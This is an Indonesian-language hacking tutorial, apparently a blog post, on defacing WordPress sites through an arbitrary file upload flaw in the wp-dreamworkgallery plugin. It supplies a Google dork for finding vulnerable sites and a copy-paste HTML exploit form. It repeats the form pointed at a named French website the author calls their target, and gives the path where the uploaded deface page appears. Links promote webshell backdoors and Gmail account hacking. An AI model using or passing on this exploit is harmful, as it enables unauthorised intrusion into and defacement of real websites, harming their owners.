Halo Sobat Apakabar? Langsung menuju tutor..
Elu Langsung menuju ke google.
DORKs "inurl:/wp-content/plugins/wp-dreamworkgallery"Baca juga — Cara Bypass File Restriction untuk Upload Shell Backdoor.
Pilih Salah Satu Website.
Copas Exploit ini di notepad lalu save ex. html :
Baca juga — 15+ Cara Menjadi Hacker Pro Seperti "Hacker Bjorka".
<form action="http://www.target.com//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
www.target.com di isi sama web target... Contoh ini target gw
<form action="http://theatredumordant.fr//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
Baca juga — 7+ Cara Hack Slot Olympus Dengan APK Modlympus (Cheat).
Kayanya Shell ga bisa di upload di metode ini. jadi langsung aja upload file deface Elu. ex Html. Lalu submit.
Baca juga — Cara Memasang Backlink di Webshell (Backdoor), Tetap Awet!.
Kalo Tampilan nya seperti itu biasanya vuln. Sekarang Cek file yg sudah kita upload tadi. Lihat gambar.. File ane ada di
/wp-content/uploads/dreamwork/480_uploadfolder/big/x.htmlBaca juga — 2000+ Script Deface HTML Terbaru 2023, Defacer Harus Punya!.
Berarti begini http://theatredumordant.fr/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html
Baca juga — 7 Cara Hack Akun Gmail 2023, Apakah Masih Work?.
DEMO :
http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml
